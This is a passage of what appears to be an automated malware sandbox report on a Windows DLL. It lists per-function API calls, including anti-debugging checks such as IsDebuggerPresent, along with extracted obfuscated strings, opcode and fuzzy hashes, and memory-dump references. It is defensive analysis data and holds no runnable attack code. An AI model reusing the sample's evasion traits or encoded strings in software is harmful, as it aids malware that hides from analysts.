                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3231365870-0
                                                                                                                                                                              • Opcode ID: be86a26a881a72ced72731234983b3092e45bcab7f89ca7c2d77cf863629ade6
                                                                                                                                                                              • Instruction ID: 14c8142e03be36ad872d4428fb803bf0b5d4e43b3ab0d51d4a03bec2e8909a99
                                                                                                                                                                              • Opcode Fuzzy Hash: be86a26a881a72ced72731234983b3092e45bcab7f89ca7c2d77cf863629ade6
                                                                                                                                                                              • Instruction Fuzzy Hash: 6421C2326CC2069EDB0D7BF884007AC37B15BC622CF11441FD680E7DC1CF62598286A7

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 6D5D512D
                                                                                                                                                                              • GetFileType.KERNELBASE(00000000), ref: 6D5D513F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileHandleType
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3000768030-0
                                                                                                                                                                              • Opcode ID: 63482330fade8a39e2d3572e8ba5e26a60be6bdda5ef305ebb2809cea3c2e614
                                                                                                                                                                              • Instruction ID: 1e389d1a8554bc3b0f8bb31497da440ef35ff06fc0d9716edf597d385e58b42a
                                                                                                                                                                              • Opcode Fuzzy Hash: 63482330fade8a39e2d3572e8ba5e26a60be6bdda5ef305ebb2809cea3c2e614
                                                                                                                                                                              • Instruction Fuzzy Hash: 6011B4316047525AC7748EBE8C88732BAA5FB47270B290F19D0F686EF1C730D4868269
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6D5CDA0E
                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 6D5CDADA
                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D5CDAF3
                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 6D5CDAFD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 254469556-0
                                                                                                                                                                              • Opcode ID: 942a81aab558fe37d51c9d3fce017fce570f7b5da994d430d453a2d515f80cf7
                                                                                                                                                                              • Instruction ID: e85bdb22e5b567f834327ad073bf37ba9f3b2d521e0c11f8928966909be7db97
                                                                                                                                                                              • Opcode Fuzzy Hash: 942a81aab558fe37d51c9d3fce017fce570f7b5da994d430d453a2d515f80cf7
                                                                                                                                                                              • Instruction Fuzzy Hash: BC312575D45219DBDF20EFA4C849BCDBBB8AF48304F1041AAE50CAB640EB749A848F55
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: =&$G=)#$GVydQAAAABzcGFuaXNoLXBhcmFndWF5AAAAAHNwYW5pc2gtcGFuYW1hAABzcGFuaXNoLW5pY2FyYWd1YQAAAHNwYW5pc2gtbW9kZXJuAABzcGFuaXNoLW1leGljYW4Ac3B$wydniskkiubezlkwvqgojxpilsggfwgcqedjmuanaxnznjoufauopuhiseqm
                                                                                                                                                                              • API String ID: 0-3632998398
                                                                                                                                                                              • Opcode ID: 84c328e95df9ad3eb88070875ee6795a7470bca84369c93d58f4025bb943449b
                                                                                                                                                                              • Instruction ID: 5434e6ba115b6feb18d33cd5c7a694166ce880ba7c8ad0c19379cf94298e712a
                                                                                                                                                                              • Opcode Fuzzy Hash: 84c328e95df9ad3eb88070875ee6795a7470bca84369c93d58f4025bb943449b
                                                                                                                                                                              • Instruction Fuzzy Hash: FB62C2722946018FD71DCE3CC6A539A7BF2AB46310F008E1DE4A6DBF94D739E9498B11
                                                                                                                                                                              Strings
                                                                                                                                                                              • Yx42y+VcOMe2pQE4xaXXqSkpKQe2pQebp6joxhdi2hhi5QfHKOjo5Tt25TtYYt42y+VcOMe2pQE4xaXXqSkpKQe2pQem56jo5TtVYqU7WGKeNsvlXDjHtqUBOMWl16kpKS, xrefs: 6D5CA168, 6D5CA534
                                                                                                                                                                              • kx3, xrefs: 6D5CA2FA
                                                                                                                                                                              • vp`", xrefs: 6D5CA045
                                                                                                                                                                              • vp`", xrefs: 6D5CA5D3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Yx42y+VcOMe2pQE4xaXXqSkpKQe2pQebp6joxhdi2hhi5QfHKOjo5Tt25TtYYt42y+VcOMe2pQE4xaXXqSkpKQe2pQem56jo5TtVYqU7WGKeNsvlXDjHtqUBOMWl16kpKS$kx3$vp`"$vp`"
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 6\5W$6\5W$vBUu$vBUu
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6D5D1A94
                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6D5D1A9E
                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6D5D1AAB
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                              • String ID:
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: .Ua$55-$55-
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: fjvukrfkipsuhgfrcaiuctsmyuqn$lfwghlwqmupf$qtgutkrmmcqftvjr
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: cyyhbffs$stwsqmsgjauqasxuantpzy$vwzpgfulg
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: :`z$:`z$2f
                                                                                                                                                                              • API String ID: 0-3157315960
                                                                                                                                                                              • Opcode ID: 940eda039a5301e00500aefc71337491d52982c9ace8ba83ab78af4ada1bd6cb
                                                                                                                                                                              • Instruction ID: 9d3607a5539f8038d81da55c04a7f15f7f71fc5f150134fb38c54b14349c6e9b
                                                                                                                                                                              • Opcode Fuzzy Hash: 940eda039a5301e00500aefc71337491d52982c9ace8ba83ab78af4ada1bd6cb
                                                                                                                                                                              • Instruction Fuzzy Hash: 1E81D271A546168FCF09CEFCC8953EF7FB1AB46320F148D1ED9209BB90C62A95458B93
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: )iK$pl/${/@?
                                                                                                                                                                              • API String ID: 0-2790675580
                                                                                                                                                                              • Opcode ID: 236d536e30ce7ca58a015b2f5734acecf1e037634d72b239917699c0460891c2
                                                                                                                                                                              • Instruction ID: 6ef5d3cdec4279edc1179992d264db90f5c47f0a40600f21d7d2f3b19191c3a5
                                                                                                                                                                              • Opcode Fuzzy Hash: 236d536e30ce7ca58a015b2f5734acecf1e037634d72b239917699c0460891c2
                                                                                                                                                                              • Instruction Fuzzy Hash: 8E51E672E541068FCF0DDEECC581BEEB7F6AB4E354F108519E410EB750C62AAD498B92
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: tf$tf
                                                                                                                                                                              • API String ID: 0-36353575
                                                                                                                                                                              • Opcode ID: 3235276ad66876301af996d0f8d3fd3876b99708063726029634f37aaa3d3cd0
                                                                                                                                                                              • Instruction ID: 89266e03f11bd0c529e50680d697179e8314ffe61754e0fa4b79f6d8f6f25e68
                                                                                                                                                                              • Opcode Fuzzy Hash: 3235276ad66876301af996d0f8d3fd3876b99708063726029634f37aaa3d3cd0
                                                                                                                                                                              • Instruction Fuzzy Hash: 4942F07AA502458FCF09CEECD4D57DE7BF2BB46315F10891ED422EBB94C63598868B02
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Yzi|$vshoyrrcntgkzwpltrcgzoklcyfyoqobmuulgety
                                                                                                                                                                              • API String ID: 0-708493925
                                                                                                                                                                              • Opcode ID: ddfb1d1e83511f7b64cb5830e96af53f816a2a355607f64cafb0c3a585a21e8f
                                                                                                                                                                              • Instruction ID: b167814240a26e81ab7d499a43e458c8473cc18fd1691fabbe701ba15988b511
                                                                                                                                                                              • Opcode Fuzzy Hash: ddfb1d1e83511f7b64cb5830e96af53f816a2a355607f64cafb0c3a585a21e8f
                                                                                                                                                                              • Instruction Fuzzy Hash: 6112F276694A018FC729CE2CC5A53A777E2BB4A354F008E1DD466CBFA4C636F849CB41
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: :.JR$tbsrzqfsnnnjozhbsllbroupropwkpvgyuwzfjrerzcdcmoqgpjztdvzjcbjcstlulzgtkvxxafflcneqdtpwlep
                                                                                                                                                                              • API String ID: 0-4013670861
                                                                                                                                                                              • Opcode ID: 64088e85a06774ec606d7621ade3f273a709fd947bbbd4208fb77f38572d15cb
                                                                                                                                                                              • Instruction ID: d563eec77b73d08669234f32a22182103ee3fa5cefdc5a04ff3b581c05ffad3b
                                                                                                                                                                              • Opcode Fuzzy Hash: 64088e85a06774ec606d7621ade3f273a709fd947bbbd4208fb77f38572d15cb
                                                                                                                                                                              • Instruction Fuzzy Hash: F712CE72A582058FDB2DDEBCC4A43DE7BF1BB46350F209929C425EBA95CB359909CF01
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: )Ug$|
                                                                                                                                                                              • API String ID: 0-1604100730
                                                                                                                                                                              • Opcode ID: 9cefcd60471377612cd7c8c76d32492e7b57af047ad4263ab479302070b6e9e8
                                                                                                                                                                              • Instruction ID: a8f14e9da492333d4cd390268b15a0a53313939495d0bbedaeb2abea3e8f5f5f
                                                                                                                                                                              • Opcode Fuzzy Hash: 9cefcd60471377612cd7c8c76d32492e7b57af047ad4263ab479302070b6e9e8
                                                                                                                                                                              • Instruction Fuzzy Hash: AB12E336AA91059FCB0ACEFCD6817DD7BF2BB4635AF108919E801E7B44C77989058F42
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Zl$y
                                                                                                                                                                              • API String ID: 0-3501366969
                                                                                                                                                                              • Opcode ID: a237bb2759f4f7c9fc12af01bed932914ce660087eee517624d58d13ead5fe00
                                                                                                                                                                              • Instruction ID: 72e6c57a8befe2b670b88cf25ff4707923ffcd319569b2d38fd869cc636bdf85
                                                                                                                                                                              • Opcode Fuzzy Hash: a237bb2759f4f7c9fc12af01bed932914ce660087eee517624d58d13ead5fe00
                                                                                                                                                                              • Instruction Fuzzy Hash: 0CE18975E542099FCB2DCEECD5907DDBBF1BB4A340F10E819E424EBA54C63998098F26
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: :$kdeshsbvkrxouoioooyyrfxvggianzzimqzltffojohbbplbnljjkcd
                                                                                                                                                                              • API String ID: 0-2150965277
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
• Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: cG~j
                                                                                                                                                                              • API String ID: 0-1641660554
                                                                                                                                                                              APIs
                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6D5D9D10,?,?,00000008,?,?,6D5D9913,00000000), ref: 6D5D9F42
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: q&[`
                                                                                                                                                                              • API String ID: 0-3673868144
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: #V[
                                                                                                                                                                              • API String ID: 0-2871392821
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6D5CDBDE
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FeaturePresentProcessor
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2325560087-0
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              Strings
                                                                                                                                                                              • pCQAAikYpiEX/U41F/1CLz+gXCQAAikYqiEX/U41F/1CLz+gFCQAAikYriEX/U41F/1CLz+jzCAAAikYwiEX/U41F/1CLz+jhCAAAikYxiEX/U41F/1CLz+jPCAAAikYyi, xrefs: 6D5BAA49, 6D5BAB8D
                                                                                                                                                                              Similarity
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: a984d7e96190a25451aa1362388a5d373d49b217620283eb6f6aebf1810fd2ac
                                                                                                                                                                              • Instruction ID: 561ac5ebbf8129ef60f372c371c6837484f90dafb8e3ded93a083ff199bd5982
                                                                                                                                                                              • Opcode Fuzzy Hash: a984d7e96190a25451aa1362388a5d373d49b217620283eb6f6aebf1810fd2ac
                                                                                                                                                                              • Instruction Fuzzy Hash: A8522276A542098FCB0CCEBCC5A57DD7BF2BB96314F208A19D811EB755C73A990A8F01
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 7751e56b3565d3e6700133c3171a3c6c8883e515df824dd619a4bb49650e6b5b
                                                                                                                                                                              • Instruction ID: 59b7d806f13803d571d16fa40ca3c4b9fa7289fc72f2e938927c325f7667e34e
                                                                                                                                                                              • Opcode Fuzzy Hash: 7751e56b3565d3e6700133c3171a3c6c8883e515df824dd619a4bb49650e6b5b
                                                                                                                                                                              • Instruction Fuzzy Hash: FB023972A905018FCF09CEBCE5A53EE77F2AB46320F10D51ED421EB795D72A590A8F12
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: f2599a7b9402da8ead862814d5b49ea1ef38562956baaf92f6ba136a8ce182bd
                                                                                                                                                                              • Instruction ID: c5f246ab69fbffb1e21d807efbf5b30b07880ee4ce8c707583a04f49ae7e769f
                                                                                                                                                                              • Opcode Fuzzy Hash: f2599a7b9402da8ead862814d5b49ea1ef38562956baaf92f6ba136a8ce182bd
                                                                                                                                                                              • Instruction Fuzzy Hash: A5917972A505098FEF08CFFDC1A53EF7BF2AB46321F10991DC411A7755C22A990ACB52
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5301fbaae4f87ab5fb06b2b7bee7496b73067fe2cecddc1b1f8bec0056b1c883
                                                                                                                                                                              • Instruction ID: 86b3895f792eca90ce4d68af25d708fe2df3cb52842413becd1232c943c0b2d0
                                                                                                                                                                              • Opcode Fuzzy Hash: 5301fbaae4f87ab5fb06b2b7bee7496b73067fe2cecddc1b1f8bec0056b1c883
                                                                                                                                                                              • Instruction Fuzzy Hash: A881E17AA142069FCF08CEBCC5957EEBBF2BB4A314F10981EE851E7740C6399945CB52
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 1b815b03f26f2d575cadcc6233bb69560a98bf1219ad83bf32192c217c5923b1
                                                                                                                                                                              • Instruction ID: dfbf121637ee23290a41642fb5789e081dbac4329995811bd332e2fd114f683e
                                                                                                                                                                              • Opcode Fuzzy Hash: 1b815b03f26f2d575cadcc6233bb69560a98bf1219ad83bf32192c217c5923b1
                                                                                                                                                                              • Instruction Fuzzy Hash: 7D810E76A542158FDB09CEECD8A07EEBBF1FB4A310F10981DD402EB760C73999458B26
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
